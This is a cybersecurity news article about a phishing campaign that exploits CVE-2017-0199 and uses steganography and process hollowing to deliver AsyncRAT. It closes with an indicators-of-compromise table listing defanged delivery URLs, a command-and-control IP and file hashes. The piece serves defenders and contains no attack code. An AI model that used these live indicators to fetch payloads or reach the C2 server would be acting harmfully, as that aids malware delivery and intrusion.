Cyber Security News

New Steganography Campaign Exploits MS Office Vulnerability to Distribute AsyncRAT

A recently uncovered cyberattack campaign has brought steganography back into the spotlight, showcasing the creative and insidious methods attackers employ to deliver malware.

This operation, dubbed the “Stego-Campaign,” exploits a known Microsoft Office vulnerability, CVE-2017-0199, to initiate infections and ultimately deploy the notorious AsyncRAT malware.

Innovative Attack Leverages Hidden Payloads in Images

The vulnerability, first reported in April 2017, enables remote code execution (RCE) without user interaction beyond opening a malicious document, making it a potent entry point for phishing-based attacks.

The attack begins with a phishing email containing a malicious Microsoft Office document that exploits CVE-2017-0199.

AsyncRATAsyncRAT
Stego-Campaign flow

Once opened, the document triggers the download of a malicious HTA script, which in turn fetches a trojanized version of Prnport.vbs, a legitimate Windows script for managing printer ports.

This tampered script constructs and executes a PowerShell command to download an injector DLL hidden within an innocuous-looking image file using steganography.

Sophisticated Payload Delivery via Trojanized Scripts and Process Hollowing

The Base64-encoded injector is embedded between specific markers in the image’s source code and can be extracted and decoded using tools like CyberChef.

Analysis reveals the injector’s original namespace as Microsoft.Win32.TaskScheduler, a 32-bit DLL confirmed via tools like Detect It Easy and CFF Explorer.

The PowerShell script dynamically loads this injector via reflection, invoking a method named “VAI” to retrieve the final payload URL, which points to a reversed, Base64-encoded AsyncRAT binary.

The payload is decoded, and through a technique known as process hollowing (T1055.012), it is injected into a legitimate MSBuild.exe process, allowing the malware to run covertly under a trusted process name.

The process hollowing flow used in this attack

AsyncRAT, an open-source remote access tool released in 2019, provides attackers with capabilities like remote desktop access, keylogging, and the ability to deploy additional malware such as ransomware.

This campaign’s use of steganography to conceal malicious code within images exemplifies the lengths to which threat actors go to evade detection.

After invoking the VAI method, the PowerShell script reverses and decodes the payload URL, fetches the AsyncRAT binary, and employs process hollowing to execute it stealthily.

The final payload, flagged by VirusTotal, includes a configuration file revealing the command-and-control (C2) IP address, underscoring the sophisticated infrastructure behind the attack.

Steganography, while not commonly seen in the wild, remains a fascinating and dangerous technique that challenges traditional defense mechanisms, as the hidden payloads are difficult to detect without specialized analysis.

Defenders must familiarize themselves with such attack flows to mitigate similar threats effectively, focusing on phishing prevention, endpoint monitoring for suspicious process behavior, and anomaly detection in network traffic.

Indicators of Compromise (IOC)

TypeValue
Trojanized Prnport.vbs (SHA256)1105ae14ccb41fedcf556e4c575e34e505e9a571f2021ba89a75fbe5fa12e3c0
AsyncRAT Delivery URLhxxps[://]watchonlinehotvideos[.]site/001[.]txt
AsyncRAT (SHA256)448ae5b8890c17a2efe49856531efd62796db52d2ff0ecbb4678334aea2bf776
AsyncRAT C2 Address148[.]113[.]214[.]176
Injector Delivery URLhxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb
Injector (Namespace)Microsoft.Win32.TaskScheduler
Injector Binary (SHA256)8CC93827CA7652AFC8E08B9266F6567D06B932AF26B601EB7FDE10F5E5A6CB30
Injected Process PathC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra

Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Recent Posts

Fedora Linux Joins the Windows Subsystem for Linux Officially

Fedora Project has announced the official availability of Fedora Linux on the Windows Subsystem for…

1 minute ago

Microsoft Launches “Copilot+ PC” for an Upgraded Windows Experience

Microsoft has announced a significant wave of new Windows experiences designed for Copilot+ PCs, which…

5 minutes ago

Nomad Bridge Hacker Apprehended in Connection with $190 Million Heist

Alexander Gurevich, a 47-year-old dual Russian-Israeli citizen, was arrested last Thursday at Ben-Gurion Airport while…

14 minutes ago

160-Year-Old Haulage Firm Falls After Cyber-Attack: Director Issues Urgent Warning

The 160-year-old haulage giant Knights of Old, once a stalwart of the UK’s logistics sector,…

18 minutes ago

SonicWall Unveils New Firewalls and Comprehensive Managed Cybersecurity Service

SonicWall has unveiled a new line of advanced firewalls and a comprehensive managed cybersecurity service…

23 minutes ago

China-Backed Hackers Target Exiled Uyghur Community with Malicious Software

Senior members of the World Uyghur Congress (WUC) living in exile were targeted with a…

27 minutes ago